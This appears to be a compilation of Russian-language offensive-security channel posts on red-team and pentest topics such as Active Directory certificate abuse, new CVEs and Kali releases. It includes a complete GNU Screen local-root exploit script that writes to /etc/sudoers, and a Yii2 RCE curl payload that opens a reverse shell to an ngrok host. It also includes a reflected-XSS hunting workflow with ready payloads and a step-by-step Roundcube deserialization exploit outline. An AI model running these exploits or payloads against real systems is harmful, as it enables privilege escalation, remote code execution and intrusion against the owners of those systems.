Несколько часов назад была сильно обновлена утилита certipy. Обратим внимание, что в документации также появилось описание техники ESC16...

#redteam #pentest #ad #adcs

CVE-2025-23395 Screen LPE exploit

#!/bin/sh

F=$(mktemp)
L=${HOME}/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] spawning GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] logfile appeared, doing hax"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ] ; then
        echo "[+] bl1ng bl1ng, we got it"
        sudo sh
else
        echo "[-] exploit failed :("
fi
rm -rf $F $L

Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395

😈 [ mpgn @mpgn_x64 ]

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥

🔗 https://github.com/Pennyw0rth/NetExec/pull/702

🐥 [ tweet ][ quote ]

😈 [ David Kennedy @Cyb3rC3lt ]

Python version of BadSuccessor by Cybrly.

🔗 https://github.com/cybrly/badsuccessor

🐥 [ tweet ]

CVE-2024–58136 — RCE PoC
*
Yii2 Framework

curl -k -X POST https://sub.domain.tld/index.php \
  -H "Content-Type: application/json" \
  -d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'

dMSASync.py

P.S. I hope the last one (by @snovvcrash)

Всем привет!
После небольшого перерыва возвращаюсь с регулярными постами и сегодня мы поговорим про...Reflected XSS😂

В качестве предисловия, среди аудитории канала большое количество матерых пентестеров и баг-хантеров, но и много новичков, которые только начинают свой путь в нашей отрасли и этот пост в большей степени для них, так как все когда-то учились. Да и в целом практически каждое техническое интервью я предпочитаю начинать с вопросов про XSS, только контекст обычно зависит от грейда кандидата.
Вообще XSS-кам, как классу уязвимостей предcказывали быструю смерть еще в 2014, когда Content Security Policy 2.0 стал фактически стандартом, но в классификации OWASP-10 от 2021 года XSS уверенно удерживает 3-е место на ряду с другими инъекциям, посмотрим как ситуация изменится в этом году.

💥Таким образом XSS:
✅ Распространенная уязвимость
✅ Дает серьезный импакт в определенных условиях
✅ Автоматизация поиска и эксплуатации

❓Как искать?
✅ Собираем все url'ы с параметрами ((?q=, ?id=, и тд) с помощью:
🔧 Paramspider - использует web.archive.org для поиска url доменов из списка
paramspider -l targets.txt
🔧 Gospider - довольно быстрый веб краулер на Go
gospider -S targets.txt -a -w -r --js --sitemap --robots -d 2 -c 10 -t 20 -K 10 \
--blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg|js|dat|pdf|webp|woff|woff2|tif|ttf|tiff2)" \
-q | tee gospider-out.txt
✅ Объединяем и сортируем выхлопы в один файлик:
cd paramspider/output
cat *.txt > paramspider_out.txt
cat paramspider_out.txt | sort -u | tee tragets_url.txt
✅ Определяем живые хосты с помощью httpx
httpx -l tragets_url.txt --threads 250 -o live_tragets_url.txt
✅ Сортируем выхлоп по расширениям:
cat live_tragets_url.txt | grep -i -e '\.php$' | tee live_tragets_url_php.txt
cat live_tragets_url.txt | grep -i -e '\.asp$' | tee live_tragets_url_asp.txt
cat live_tragets_url.txt | grep -i -e '\.aspx$' | tee live_tragets_url_aspx.txt
cat live_tragets_url.txt | grep -i -e '\.jsp$' | tee live_tragets_url_jsp.txt
cat live_tragets_url.txt | grep -i -e '\.do$' | tee live_tragets_url_do.txt
✅ Ищем отраженные параметры с помощью:
🔧 Dalfox
dalfox file live_tragets_url_jsp.txt --skip-xss-scanning -o live_tragets_url_jsp_reflecting.txt
✅ Определяем отраженный контекст:
🔖 Reflected Between HTML Tags
<p>"><zxcvbro>Bro</p>
🔧 Используем полезную нагрузку:
<img src=x onerror=prompt(1)>
<details open ontoggle=prompt(origin)>
<svg onload=confirm(1)>
🔐 Reflected Inside HTML Tag Attributes
<input value="><zxcvbro>Bro">
🔧 Используем полезную нагрузку:
" autofocus onfocus=alert(document.domain) x="
"><script>alert(1)</script>
📜 Reflected Inside JavaScript
<script>
var input = '"><zxcvbro>Bro';
</script>
🔧 Используем полезную нагрузку:
';alert(1)//
'-alert(1)-'
</script><img src=1 onerror=alert(1)>
✅ Сдаем багу
✅ Вы великолепны💸

Ого, какой крутой вектор атаки выстроил т.н. "белый хакер" @baksist!

Как цепочка классических багов может привести к полной компрометации

Мой коллега из Singleton Security, старший спец. по анализу защищенности @baksist выкатил на Хакере прикольный разбор пентеста интернет-провайдера.

Типичная грустная ситуация для пентестеров, которым достался маленький скоуп (всего 9 IP), переросла в неплохешную цепочку багов, приведших к компрометации серверов провайдера.

Внутри — полный сборник трешовых ошибок разрабов, которые классно склеились во что-то единое:

— LFR через кривой rewrite
— MD5-хеши без соли
— повторы паролей
— самописная ERP с PTRAV при аплоаде
— отсутствие нормальной изоляции между сервисами

🧂 Про соль отдельно. Когда хранят MD5 без соли, это как хранить ключи в конверте с подписью «ключи от дома». Нравоучать не буду, разрабов которые в 2025 юзают MD5 для хранения паролей проще просто пристрелить и купить подписку на ChatGPT за 20$.

Рекомендую, кайфово почитать прохладную про блуждания хакера в PHP сервисах:
https://xakep.ru/2025/05/22/provider-case/

baksist, респект 💪

⚠️ We've reproduced CVE-2025-49113 in Roundcube.

This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.

If you're running Roundcube — update immediately!

Полный гайд по эксплуатации ADCS от ESC1 до ESC16. Понятно, что материалов по этой теме и так много, но пусть будет под рукой))

https://xbz0n.sh/blog/adcs-complete-attack-reference

#ad #adcs #privesc #pentest #redteam

🔥 9.9 Critical
Post Auth RCE для Roundсube

Небезопасная десериализация. Инжектится через GET-параметр _from, — в Roundcube он указывает на раздел, куда надо вернуться, после отправки сообщения.

?_task=settings&_action=upload&_from=mail%2Finbox

Пошагово, как работает эксплоит:
1. Подменяет _from сериализованным объектом.
2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через rcube_pgp_engine → Crypt_GPG_Engine.
4. Во время вызова GPG-логики, Roundcube вызывает unserialize().
5. Триггерится код из первого шага

exploit // nuclei // research

CVE-2025-32756: Fortinet UnAuth RCE

PoC: https://github.com/kn0x0x/CVE-2025-32756-POC

Affected Products: FortiVoice, FortiMail, FortiNDR, FortiRecorder, FortiCamera

#exploit #git #pentest #redteam

Kali Linux 2025.2 вышел!

Второе обновление Kali Linux в этом году — версия 2025.2 — приносит сразу 13 новых инструментов, полностью обновлённое меню приложений (оно теперь построено по структуре MITRE ATT&CK Framework), обновление GNOME до версии 48 и множество других улучшений.
Среди новинок — свежий набор инструментов.

● Улучшена интеграция VPN‑индикатора и обновлены BloodHound, NetHunter, CARsenal.
● Добавлены свежие утилиты: azurehound, binwalk3, bloodhound-ce-python, chisel, gitxray, ldeep, ligolo-ng, rubeus, tinja и др.
● В NetHunter — поддержка новых атак на Wi-Fi и авто, новые ядра для Android‑устройств и Raspberry Pi.

Новые инструменты:

- bloodhound-
- azurehound;
- bopscrk;
- chisel-common-binaries;
- crlfuzz;
- donut-shellcode;
- binwalk3;
- gitxray;
- tinja.
- ldeep;
- ligolo
- rubeus;
- sharphound;

📌 Подробнее

@linuxkalii

Ну вот и PoC для недавно обнаруженной уязвимости в протоколе обмена файлами Windows (SMB) CVE-2025-33073

https://github.com/mverschu/CVE-2025-33073?tab=readme-ov-file

😈 [ SpecterOps @SpecterOps ]

Introducing the BloodHound Query Library!

📚 https://queries.specterops.io/

@martinsohndk & @joeydreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem.

🔗 https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/

🐥 [ tweet ]

#activedirectory #ad #pentest

Делаем свои словари для пентеста:
берем словарь (тык) + берем скрипт (тык)

Возможные шаблоны для генерации:

  i.s   → a.ivanov
  i_s   → a_ivanov
  is    → aivanov
  si    → ivanova
  s_i   → ivanov_a
  s.i   → ivanov.a
  s     → ivanov

usage:

python3 word_gen.py russian_names/russian_trans_surnames.txt -o wordlist.txt -p s.i,s_i,i_s

А все свою FreeIPA обновили? Там в 4.12.4 пофиксили CVE-2025-4404, через которую аутентифицированный юзер мог сам себе доменного админа выписать. Другой службы каталогов у нас для вас нет...

https://www.freeipa.org/release-notes/4-12-4.html